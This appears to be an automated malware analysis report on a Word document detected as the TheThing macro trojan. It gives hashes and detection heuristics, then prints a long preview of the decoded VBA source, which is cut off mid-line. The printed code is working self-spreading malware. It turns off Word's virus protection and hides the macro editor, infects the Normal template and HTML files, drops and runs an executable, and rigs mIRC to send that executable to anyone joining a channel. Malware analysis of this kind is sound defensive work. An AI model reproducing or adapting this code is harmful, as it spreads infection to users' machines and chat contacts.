Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4312dce9b583bf02…

MALICIOUS

Office (OLE)

81.0 KB Created: 2000-07-16 04:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 64f2ffa27666afb9f0dfd71afdeeae66 SHA-1: 16a3a9d03651b71cf0968943f550df63859a8ecd SHA-256: 4312dce9b583bf028cd4467710bd15d37296f4a8019467c0c70fa3d252ffa474
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Word document containing VBA macros. Heuristics indicate the use of Shell(), CreateObject(), and GetObject() functions, commonly used for executing external commands or loading objects. The script explicitly calls `Shell("c:\thething.com", 6)` which attempts to execute a file named 'thething.com' from the root of the C drive, suggesting a downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Trojan.TheThing-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.TheThing-9
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63052 bytes
SHA-256: dd063b1c69659ebc2fb71044d9f89c3d7f755e43beb45aada603d573aa710509
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<html> <CyberShadow>
'<BODY>
'<script language="VBScript"><!--
'Private Sub Window_Onload()
' On Error Resume Next
' If Location.protocol = "file:" Then
'  Dim FSO
'  Set FSO = CreateObject("Scripting.FileSystemObject")
'  HostPath = Replace(Location.href, "file:///", "")
'  HostPath = Replace(HostPath, "/", "\")
'  Set WordObj = GetObject("", "Word.Application"): Quit = 0
'  If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
'  Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule
'  If NT.Lines(1, 1) <> "'<html> <CyberShadow>" Then
'   WordObj.Options.SaveNormalPrompt = False
'   NT.DeleteLines 1, NT.CountOfLines
'   NT.AddFromFile HostPath
''NT.NormalTemplate.Save
'   For j = 1 To 29
'    NT.ReplaceLine j, "'" + NT.Lines(j, 1)
'   Next
'   For j = 30 To NT.CountOfLines - 3
'    NT.ReplaceLine j, Mid(NT.Lines(j, 1), 2, Len(NT.Lines(j, 1)))
'   Next
'  End If
'  Set NT = Nothing
'  If Quit = 1 Then WordObj.Quit
' End If
'End Sub
Private Sub Document_Close()
 On Error Resume Next
 'TheThing
 'by CyberShadow//SMF
 Call DisableAll
 Call infectDoc
 Call infectMIRC
 Call WriteDump("c:\"): ' rv = Shell("c:\thething.com", 6)
 Kill "c:\thething.com"
 Call infectHTMS
 Application.ScreenUpdating = True
End Sub
Private Sub infectHTMS()
 On Error Resume Next
 a = System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders", "Personal")
 Call SearchForHTM(a)
 a = Environ("PATH")
 i = 1
 Do While i <= Len(a)
  c = ""
  Do While i <= Len(a) And Mid$(a, i, 1) <> ";"
   c = c + Mid$(a, i, 1)
   i = i + 1
  Loop
  Call SearchForHTM(c)
  i = i + 1
 Loop
End Sub
Private Sub ViewVBCode(): Stealth: End Sub
Private Sub ToolsMacro(): Stealth: End Sub
Private Sub FileTemplates(): Stealth: End Sub
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Private Sub SearchForHTM(PathForHTM)
 On Error Resume Next
 Target = Dir$(PathForHTM + "\*.htm*")
 If Target = "" Then GoTo NoHTMs
 Do
  Open PathForHTM + "\" + Target For Input As #1
  Line Input #1, a
  If a <> "<html> <CyberShadow>" Then
   c = a
   Do While Not EOF(1)
    Input #1, a
    c = c + Chr$(13) + Chr$(10) + a
   Loop
  Close #1
  Open PathForHTM + "\" + Target For Output As #1
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   For i = 1 To AD.countoflines
    ca = AD.lines(i, 1)
    If i < 30 Then ca = Mid$(ca, 2, Len(ca) - 1)
    If i >= 30 And i < AD.countoflines - 2 Then ca = "'" + ca
    If ca <> "" Then Print #1, ca
   Next
  Print #1, c
  End If
  Close #1
  Target = Dir$
 Loop While Target <> ""
NoHTMs:
End Sub
Private Sub infectMIRC()
 For i = 0 To 5
  a = Chr$(Asc("C") + i)
  Call infect(a)
 Next
End Sub
Private Sub infect(a)
 On Error GoTo outta
 a1 = a + ":\mirc\"
 Open a1 + "script.ini" For Output As #1
  Print #1, "[script]"
  Print #1, "n0=on 1:JOIN:#:/dcc send $nick " + a1 + "thething.com"
 Close #1
 dropperPath = a1
 Call WriteDump(dropperPath)
outta:
End Sub
Private Sub DisableAll()
 On Error Resume Next
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 With Application
  .EnableCancelKey = True
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
End Sub
Private Sub infectDoc()
 On Error Resume Next
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) <> "'<html> <CyberShadow>" Then
   NT.DeleteLines 1, NT.countoflines
   NT.Insertlines 1, AD.lines(1, AD.countoflines)
 End If
 If AD.lines(1, 1) <> "'<html> <Cy
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.